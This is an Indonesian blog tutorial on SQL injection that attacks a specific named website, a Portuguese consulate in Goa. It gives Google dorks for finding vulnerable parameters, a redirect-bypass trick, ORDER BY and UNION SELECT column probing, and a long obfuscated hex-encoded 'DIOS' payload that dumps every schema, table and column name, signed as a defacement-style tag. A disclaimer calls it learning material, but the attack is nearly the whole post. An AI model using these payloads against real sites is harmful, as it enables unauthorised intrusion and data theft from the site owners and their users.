Lompat ke konten Lompat ke sidebar Lompat ke footer

SQL Injection bypass redirect to homepage #1

sql injection bypass redirect
sql injection bypass redirect

Tutorial SQL Injection bypass redirect to homepage part 1

Perhatian: Tutorial pada halaman ini hanyalah pembelajaran semata, jika anda menerapkan tutorial pada halaman ini untuk sebuah penyerangan jangan salahkan saya, saya tidak akan bertanggung jawab atas apa yang anda lakukan nantinya, karena halaman ini tidak menyarankan anda untuk melakukan hal buruk pada website yang anda inject

Assalamualaikum, halo pengunjung selamat datang di blog saya Randi Noober, pada halaman kali ini saya memberikan tutorial bypass redirect ke halaman beranda saat SQL Injection, untuk halaman kali ini masalah bypassnya juga tergantung dari website itu sendiri, jadi kalau cara bypassnya pada halaman ini berbeda ataupun tidak berhasil jangan salahkan saya.. Karena setiap website bisa jadi bypassnya juga berbeda, oke langsung saja ke tutorialnya.

Target website yang bakalan inject: 
https://www.consuladoportugalgoa,com
Nah untuk parameter buat injectnya tinggal disearch aja di google, caranya? Ketik pada kolom pencarian google.
site:urlwebsite.com .php?=
rsql injection bypass redirect
mencari parameter. 


Nah kalo udh dapat parameternya coba ketik tanda ' diurl lalu tekan enter, contoh. 

https://www.consuladoportugalgoa,com/pages.php?id=2'

sql injection bypass redirect

Nah, saat saya kasi tanda ' halamannya jadi berubah, atau muncul error, brarti webnya vuln sql injection, klo udh gitu kasi tanda --+- atau -- -, contoh.

https://www.consuladoportugalgoa,com/pages.php?id=2'--+-
sql injection bypass redirect
sql injection bypass redirect.

Pas dienter malah keredirect ke homepage, berarti tanda ' nya hapus aja, contoh.

https://www.consuladoportugalgoa.com/pages.php?id=2--+-
sql injection bypass redirect
sql injection bypass redirect

Nah pas saya enter nggk keredirect, kalo gitu lanjut ke lankah selanjutnya yaitu memasukan query order by atau sejenisnya seperti group by, oke langsung aja kelangkah selanjutnya. 


https://www.consuladoportugalgoa.com/pages.php?id=2+ORDER+BY+1--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+2--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+3--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+4--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+5--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+6--+- NORMAL
https://www.consuladoportugalgoa.com/pages.php?id=2+ORDER+BY+7--+- REDIRECT

ternyata jumlah kolomnya ada 6,sesuai query yg dimasukan, karena Redirectnya diangka 7 berarti jumlah kolomnya ada 6,oke langkah selanjutnya adalah memasukan query union select untuk mengetahui angka togelnya sekaligus menambahkan tanda - dibelakang angka parameter, contoh.
https://www.consuladoportugalgoa.com/pages.php?id=-2+UNION+SELECT+1,2,3,4,5,6--+-
Seperti query diatas bahwa jumlah angka 1 sampai 6 tergantung jumlah Kolomnya hugs, jadi kalo jumlah kolomnya ada 100 berarti saat query union select 1 sampai 100, oke disini angka togelnya sudah nuncio, jadi tinggal tempel aja dios sqli anda sesuai angka yang muncul pada halaman di url query union select, contoh.

https://www.consuladoportugalgoa.com/pages.php?id=-2+UNION+SELECT+1,/*!00000concat*/('injected+by+./randiXploit',version(),0x3c62723e44622055736572203a20,user(),0x3C62723E3C62723E3C2F666F6E743E3C7461626C6520626F726465723D2231223E3C74686561643E3C7472207374796C653D226261636B67726F756E642D636F6C6F723A626C61636B3B223E3C74683E44415441424153453C2F74683E3C74683E5441424C453C2F74683E3C74683E434F4C554D4E3C2F74683E3C2F74686561643E3C2F74723E3C74626F64793E,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6--+-
Nah berikut adalah tampilan halaman saat di execute.

sql injection bypass redirect
sql injection bypass redirect
Jika masih tidak paham, anda bisa menonton video dibawah. 

Nahkan isi databasenya nuncio, okelah sekian tutorial sql injection pada halaman ink, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum. 

Posting Komentar untuk "SQL Injection bypass redirect to homepage #1"